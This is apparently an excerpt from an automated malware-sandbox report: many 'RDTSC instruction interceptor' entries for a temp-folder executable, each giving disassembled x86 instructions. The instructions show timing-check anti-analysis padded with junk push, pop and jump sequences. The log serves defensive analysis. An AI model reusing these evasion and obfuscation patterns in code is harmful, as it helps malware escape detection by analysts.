Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90202 second address: 4E90208 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90208 second address: 4E90232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1873h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007F7FDD3F186Bh 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90232 second address: 4E90284 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7FDCFD229Bh 0x00000009 sub eax, 3C4271DEh 0x0000000f jmp 00007F7FDCFD22A9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F7FDCFD229Ah 0x00000020 adc cl, FFFFFFD8h 0x00000023 jmp 00007F7FDCFD229Bh 0x00000028 popfd 0x00000029 push eax 0x0000002a push edx 0x0000002b mov dl, cl 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90284 second address: 4E902BA instructions: 0x00000000 rdtsc 0x00000002 mov ebx, 73AC8AC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, edi 0x0000000b jmp 00007F7FDD3F186Dh 0x00000010 test esi, esi 0x00000012 jmp 00007F7FDD3F186Eh 0x00000017 je 00007F804F90FBCFh 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov ecx, edx 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E902BA second address: 4E902C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7FDCFD229Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E902C9 second address: 4E902CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E902CD second address: 4E902E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f pushad 0x00000010 push edx 0x00000011 movzx ecx, dx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E902E5 second address: 4E90317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 je 00007F804F90FBA4h 0x0000000e pushad 0x0000000f mov edx, ecx 0x00000011 push ecx 0x00000012 mov dx, F31Ah 0x00000016 pop edi 0x00000017 popad 0x00000018 mov edx, dword ptr [esi+44h] 0x0000001b jmp 00007F7FDD3F186Eh 0x00000020 or edx, dword ptr [ebp+0Ch] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90317 second address: 4E9031B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E9031B second address: 4E90338 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90338 second address: 4E90375 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD22A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f jmp 00007F7FDCFD229Eh 0x00000014 jne 00007F804F4F05BDh 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F7FDCFD229Ah 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90375 second address: 4E9037B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E9037B second address: 4E90399 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD229Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [esi+48h], 00000001h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov eax, edi 0x00000012 mov eax, edx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90399 second address: 4E903A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E903A1 second address: 4E903C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jne 00007F804F4F058Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7FDCFD22A4h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E903C4 second address: 4E903CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E903CA second address: 4E903CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E903CE second address: 4E903D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80739 second address: 4E80789 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD229Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c movzx ecx, dx 0x0000000f mov edi, 6120FAA4h 0x00000014 popad 0x00000015 and esp, FFFFFFF8h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007F7FDCFD229Fh 0x00000021 and ax, AABEh 0x00000026 jmp 00007F7FDCFD22A9h 0x0000002b popfd 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80789 second address: 4E807A4 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov edi, 7B0F88A0h 0x0000000c popad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7FDD3F186Bh 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E807A4 second address: 4E80884 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD22A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c pushad 0x0000000d mov dx, si 0x00000010 jmp 00007F7FDCFD22A8h 0x00000015 popad 0x00000016 xchg eax, esi 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F7FDCFD229Eh 0x0000001e or eax, 531267A8h 0x00000024 jmp 00007F7FDCFD229Bh 0x00000029 popfd 0x0000002a jmp 00007F7FDCFD22A8h 0x0000002f popad 0x00000030 push eax 0x00000031 jmp 00007F7FDCFD229Bh 0x00000036 xchg eax, esi 0x00000037 pushad 0x00000038 jmp 00007F7FDCFD22A4h 0x0000003d pushfd 0x0000003e jmp 00007F7FDCFD22A2h 0x00000043 or esi, 0E2B4F98h 0x00000049 jmp 00007F7FDCFD229Bh 0x0000004e popfd 0x0000004f popad 0x00000050 mov esi, dword ptr [ebp+08h] 0x00000053 pushad 0x00000054 push eax 0x00000055 pushad 0x00000056 popad 0x00000057 pop ebx 0x00000058 popad 0x00000059 mov ebx, 00000000h 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F7FDCFD229Fh 0x00000065 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80884 second address: 4E8088A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E8088A second address: 4E8088E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E8088E second address: 4E809B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F186Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d jmp 00007F7FDD3F1876h 0x00000012 je 00007F804F91733Dh 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F7FDD3F186Eh 0x0000001f sub si, DEB8h 0x00000024 jmp 00007F7FDD3F186Bh 0x00000029 popfd 0x0000002a mov di, si 0x0000002d popad 0x0000002e cmp dword ptr [esi+08h], DDEEDDEEh 0x00000035 jmp 00007F7FDD3F1872h 0x0000003a mov ecx, esi 0x0000003c pushad 0x0000003d mov esi, 035B51ADh 0x00000042 pushfd 0x00000043 jmp 00007F7FDD3F186Ah 0x00000048 add esi, 528BF848h 0x0000004e jmp 00007F7FDD3F186Bh 0x00000053 popfd 0x00000054 popad 0x00000055 je 00007F804F9172E8h 0x0000005b jmp 00007F7FDD3F1876h 0x00000060 test byte ptr [77436968h], 00000002h 0x00000067 jmp 00007F7FDD3F1870h 0x0000006c jne 00007F804F9172C8h 0x00000072 jmp 00007F7FDD3F1870h 0x00000077 mov edx, dword ptr [ebp+0Ch] 0x0000007a jmp 00007F7FDD3F1870h 0x0000007f xchg eax, ebx 0x00000080 push eax 0x00000081 push edx 0x00000082 pushad 0x00000083 jmp 00007F7FDD3F186Dh 0x00000088 pushfd 0x00000089 jmp 00007F7FDD3F1870h 0x0000008e xor ecx, 4247E298h 0x00000094 jmp 00007F7FDD3F186Bh 0x00000099 popfd 0x0000009a popad 0x0000009b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E809B2 second address: 4E80A1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7FDCFD229Fh 0x00000009 or cl, 0000005Eh 0x0000000c jmp 00007F7FDCFD22A9h 0x00000011 popfd 0x00000012 mov si, 1827h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F7FDCFD22A6h 0x00000021 sbb si, D688h 0x00000026 jmp 00007F7FDCFD229Bh 0x0000002b popfd 0x0000002c popad 0x0000002d xchg eax, ebx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80A1B second address: 4E80A1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80A1F second address: 4E80A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80A25 second address: 4E80A2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80A2B second address: 4E80A2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80A2F second address: 4E80A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a mov edx, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e call 00007F7FDD3F1878h 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80A56 second address: 4E80A93 instructions: 0x00000000 rdtsc 0x00000002 mov si, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b call 00007F7FDCFD22A8h 0x00000010 pop esi 0x00000011 call 00007F7FDCFD229Bh 0x00000016 pop eax 0x00000017 popad 0x00000018 push ebx 0x00000019 mov bx, si 0x0000001c pop ecx 0x0000001d popad 0x0000001e xchg eax, ebx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push ebx 0x00000023 pop eax 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80A93 second address: 4E80AB4 instructions: 0x00000000 rdtsc 0x00000002 mov bx, C7FAh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push dword ptr [ebp+14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7FDD3F1873h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80AB4 second address: 4E80AB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80AB9 second address: 4E80AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F7FDD3F1875h 0x0000000a add cl, FFFFFFD6h 0x0000000d jmp 00007F7FDD3F1871h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push dword ptr [ebp+10h] 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d pop ebx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80B16 second address: 4E80B51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F7FDCFD229Fh 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop esi 0x0000000f jmp 00007F7FDCFD22A5h 0x00000014 pop ebx 0x00000015 pushad 0x00000016 movzx esi, bx 0x00000019 pushad 0x0000001a mov edx, 3BF4B8DAh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E80B51 second address: 4E80B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov esp, ebp 0x00000008 pushad 0x00000009 mov ecx, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90D17 second address: 4E90D1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90D1D second address: 4E90D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90D21 second address: 4E90D40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7FDCFD22A4h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90D40 second address: 4E90D57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F7FDD3F1871h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90A0B second address: 4E90A54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 mov esi, edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F7FDCFD22A0h 0x00000012 pushfd 0x00000013 jmp 00007F7FDCFD22A2h 0x00000018 or si, 4AF8h 0x0000001d jmp 00007F7FDCFD229Bh 0x00000022 popfd 0x00000023 popad 0x00000024 mov dword ptr [esp], ebp 0x00000027 pushad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4F10841 second address: 4F10847 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4F10847 second address: 4F1084B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3131C2 second address: 3131C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4F00A54 second address: 4F00A92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 22h 0x00000005 mov cx, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F7FDCFD22A8h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7FDCFD22A7h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4F00A92 second address: 4F00AB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 movsx ebx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7FDD3F1874h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4F00AB7 second address: 4F00ABD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4F00ABD second address: 4F00ACE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7FDD3F186Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4F0097E second address: 4F0098D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD229Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EA00E9 second address: 4EA012B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov di, ax 0x0000000e mov dx, cx 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F7FDD3F1877h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EA012B second address: 4EA0148 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD22A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EA0148 second address: 4EA0158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7FDD3F186Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EA0158 second address: 4EA0188 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD229Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F7FDCFD22A6h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 movzx esi, dx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EA0188 second address: 4EA01A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov si, bx 0x00000009 popad 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7FDD3F186Ch 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4F00C6B second address: 4F00CA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7FDCFD229Fh 0x00000008 jmp 00007F7FDCFD22A8h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F7FDCFD229Ah 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4F00CA9 second address: 4F00CB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F186Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4F00CB8 second address: 4F00CBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4F00CBE second address: 4F00CE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bx, ax 0x00000010 call 00007F7FDD3F1874h 0x00000015 pop ecx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4F00CE4 second address: 4F00D19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push dword ptr [ebp+0Ch] 0x0000000d pushad 0x0000000e mov al, 33h 0x00000010 movsx edi, cx 0x00000013 popad 0x00000014 push dword ptr [ebp+08h] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a call 00007F7FDCFD22A5h 0x0000001f pop eax 0x00000020 mov di, E3A4h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4F00DB7 second address: 4F00DD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx eax, al 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB050F second address: 4EB0513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB0513 second address: 4EB0519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB0519 second address: 4EB0537 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD22A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB0537 second address: 4EB053D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB053D second address: 4EB059D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F7FDCFD22A8h 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f mov cx, di 0x00000012 jmp 00007F7FDCFD229Fh 0x00000017 popad 0x00000018 push FFFFFFFEh 0x0000001a jmp 00007F7FDCFD22A6h 0x0000001f push 53DF1293h 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F7FDCFD229Ch 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB059D second address: 4EB05A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4EB05A3 second address: 4EB05A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
